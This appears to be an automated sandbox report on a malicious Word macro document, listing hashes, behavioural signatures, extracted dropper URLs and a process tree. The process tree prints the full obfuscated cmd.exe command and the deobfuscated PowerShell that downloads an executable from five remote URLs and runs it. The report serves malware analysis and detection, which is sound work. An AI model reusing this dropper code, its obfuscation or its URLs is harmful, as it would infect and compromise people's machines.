Analysis
-
max time kernel
144s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
04-05-2024 22:57
General
-
Target
14daa4102435e660c6bb0ee22647be5f_JaffaCakes118.doc
-
Size
249KB
-
MD5
14daa4102435e660c6bb0ee22647be5f
-
SHA1
2d5e7f62e05070d47172f78261fcd51981d729f4
-
SHA256
be308880645b0a69fc1542b416dc00d1af234a51bfc2bb94ab8f499474fc605f
-
SHA512
6c46362575444c328a9259034cf92aff13580d2e40da94826b0cdd0de82a22618c479d52874c48b30237e492e1250c63bf301a886b23f37c66f549a562c47d5c
-
SSDEEP
3072:YyfLEIteDJp626aAaP/2iFsPZkjL/xSu90OoiLuDKZXfwKeljR1B:YyfL8Ozda32rZSxUOmD+XfwLl
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://bestprogrammingbooks.com/wp-admin/caD67CPRUd
exe.dropper
http://www.pabloteixeira.com/xoUPk7FI
exe.dropper
http://shoesstockshop.ru/xxLR1CX
exe.dropper
http://maisonvoltaire.org/EsUDRwECHV
exe.dropper
http://xaydungphuongdong.net/C2AGBs7Ah
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\14daa4102435e660c6bb0ee22647be5f_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set S8M=gw-1H'Tc=GVFEv/l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,56,65,12,65,65,72,70,24,24,50,28,12,36,69,2,73,44,3,56,55,56,6,12,28,27,36,69,2,45,44,3,56,15,15,23,16,46,35,7,15,18,8,5,1,53,60,67,39,7,34,5,43,16,39,71,35,42,32,8,35,64,1,2,60,68,42,64,7,33,23,24,64,33,74,22,64,68,51,15,52,64,35,33,43,16,1,52,31,1,20,52,31,8,5,55,33,33,53,36,14,14,68,64,71,33,53,46,60,0,46,39,32,32,52,35,0,68,60,60,34,71,74,7,60,32,14,1,53,2,39,31,32,52,35,14,7,39,48,62,61,51,27,17,21,31,57,55,33,33,53,36,14,14,1,1,1,74,53,39,68,15,60,33,64,52,49,64,52,46,39,74,7,60,32,14,49,60,21,27,34,61,11,72,57,55,33,33,53,36,14,14,71,55,60,64,71,71,33,60,7,34,71,55,60,53,74,46,54,14,49,49,41,17,3,51,47,57,55,33,33,53,36,14,14,32,39,52,71,60,35,13,60,15,33,39,52,46,64,74,60,46,0,14,12,71,21,48,17,1,12,51,4,10,57,55,33,33,53,36,14,14,49,39,37,31,54,35,0,53,55,54,60,35,0,31,60,35,0,74,35,64,33,14,51,59,50,9,38,71,61,50,55,5,74,65,53,15,52,33,29,5,57,5,26,43,16,1,20,20,34,39,8,5,13,34,67,42,67,68,5,43,16,42,54,20,15,67,23,8,23,5,19,19,30,5,43,16,7,68,52,71,18,8,5,52,15,20,35,42,67,5,43,16,32,7,1,1,34,8,16,64,35,13,36,33,64,32,53,63,5,40,5,63,16,42,54,20,15,67,63,5,74,64,49,64,5,43,18,60,46,64,39,7,55,29,16,39,42,52,42,53,23,52,35,23,16,1,52,31,1,20,52,31,26,66,33,46,37,66,16,39,71,35,42,32,74,48,60,1,35,15,60,39,31,11,52,15,64,29,16,39,42,52,42,53,44,23,16,32,7,1,1,34,26,43,16,20,42,71,33,13,42,15,8,5,39,55,68,42,13,1,5,43,72,18,23,29,29,9,64,33,2,72,33,64,32,23,16,32,7,1,1,34,26,74,15,64,35,0,33,55,23,2,0,64,23,73,30,30,30,30,26,23,66,72,35,13,60,34,64,2,72,33,64,32,23,16,32,7,1,1,34,43,16,13,13,1,68,7,42,8,5,42,55,67,34,46,31,1,5,43,68,46,64,39,34,43,58,58,7,39,33,7,55,66,58,58,16,53,20,52,18,67,8,5,39,54,71,1,1,31,5,43,81)do set xUe=!xUe!!S8M:~%I,1!&&if %I==81 echo !xUe:~5!|cmd.exe"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V:O/C"set S8M=gw-1H'Tc=GVFEv/l$Rf9qUW N5)PM(0dmtkn:yBa\Lj;,3rXDxACipuh%@}2o76+eS{zb~OsI4.&&for %I in (53,60,1,56,27,21,38,41,72,51,36,69,25,44,3,56,46,56,65,12,65,65,72,70,24,24,50,28,12,36,69,2,73,44,3,56,55,56,6,12,28,27,36,69,2,45,44,3,56,15,15,23,16,46,35,7,15,18,8,5,1,53,60,67,39,7,34,5,43,16,39,71,35,42,32,8,35,64,1,2,60,68,42,64,7,33,23,24,64,33,74,22,64,68,51,15,52,64,35,33,43,16,1,52,31,1,20,52,31,8,5,55,33,33,53,36,14,14,68,64,71,33,53,46,60,0,46,39,32,32,52,35,0,68,60,60,34,71,74,7,60,32,14,1,53,2,39,31,32,52,35,14,7,39,48,62,61,51,27,17,21,31,57,55,33,33,53,36,14,14,1,1,1,74,53,39,68,15,60,33,64,52,49,64,52,46,39,74,7,60,32,14,49,60,21,27,34,61,11,72,57,55,33,33,53,36,14,14,71,55,60,64,71,71,33,60,7,34,71,55,60,53,74,46,54,14,49,49,41,17,3,51,47,57,55,33,33,53,36,14,14,32,39,52,71,60,35,13,60,15,33,39,52,46,64,74,60,46,0,14,12,71,21,48,17,1,12,51,4,10,57,55,33,33,53,36,14,14,49,39,37,31,54,35,0,53,55,54,60,35,0,31,60,35,0,74,35,64,33,14,51,59,50,9,38,71,61,50,55,5,74,65,53,15,52,33,29,5,57,5,26,43,16,1,20,20,34,39,8,5,13,34,67,42,67,68,5,43,16,42,54,20,15,67,23,8,23,5,19,19,30,5,43,16,7,68,52,71,18,8,5,52,15,20,35,42,67,5,43,16,32,7,1,1,34,8,16,64,35,13,36,33,64,32,53,63,5,40,5,63,16,42,54,20,15,67,63,5,74,64,49,64,5,43,18,60,46,64,39,7,55,29,16,39,42,52,42,53,23,52,35,23,16,1,52,31,1,20,52,31,26,66,33,46,37,66,16,39,71,35,42,32,74,48,60,1,35,15,60,39,31,11,52,15,64,29,16,39,42,52,42,53,44,23,16,32,7,1,1,34,26,43,16,20,42,71,33,13,42,15,8,5,39,55,68,42,13,1,5,43,72,18,23,29,29,9,64,33,2,72,33,64,32,23,16,32,7,1,1,34,26,74,15,64,35,0,33,55,23,2,0,64,23,73,30,30,30,30,26,23,66,72,35,13,60,34,64,2,72,33,64,32,23,16,32,7,1,1,34,43,16,13,13,1,68,7,42,8,5,42,55,67,34,46,31,1,5,43,68,46,64,39,34,43,58,58,7,39,33,7,55,66,58,58,16,53,20,52,18,67,8,5,39,54,71,1,1,31,5,43,81)do set xUe=!xUe!!S8M:~%I,1!&&if %I==81 echo !xUe:~5!|cmd.exe"3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $rnclf='wpozack';$asnjm=new-object Net.WebClient;$widwqid='http://bestprogrammingbooks.com/wp-admin/caD67CPRUd@http://www.pabloteixeira.com/xoUPk7FI@http://shoesstockshop.ru/xxLR1CX@http://maisonvoltaire.org/EsUDRwECHV@http://xaydungphuongdong.net/C2AGBs7Ah'.Split('@');$wqqka='vkzjzb';$juqlz = '990';$cbisf='ilqnjz';$mcwwk=$env:temp+'\'+$juqlz+'.exe';foreach($ajijp in $widwqid){try{$asnjm.DownloadFile($ajijp, $mcwwk);$qjstvjl='ahbjvw';If ((Get-Item $mcwwk).length -ge 40000) {Invoke-Item $mcwwk;$vvwbcj='jhzkrdw';break;}}catch{}}$pqifz='auswwd';"4⤵
-
-
C:\Windows\system32\cmd.execmd.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $rnclf='wpozack';$asnjm=new-object Net.WebClient;$widwqid='http://bestprogrammingbooks.com/wp-admin/caD67CPRUd@http://www.pabloteixeira.com/xoUPk7FI@http://shoesstockshop.ru/xxLR1CX@http://maisonvoltaire.org/EsUDRwECHV@http://xaydungphuongdong.net/C2AGBs7Ah'.Split('@');$wqqka='vkzjzb';$juqlz = '990';$cbisf='ilqnjz';$mcwwk=$env:temp+'\'+$juqlz+'.exe';foreach($ajijp in $widwqid){try{$asnjm.DownloadFile($ajijp, $mcwwk);$qjstvjl='ahbjvw';If ((Get-Item $mcwwk).length -ge 40000) {Invoke-Item $mcwwk;$vvwbcj='jhzkrdw';break;}}catch{}}$pqifz='auswwd';5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB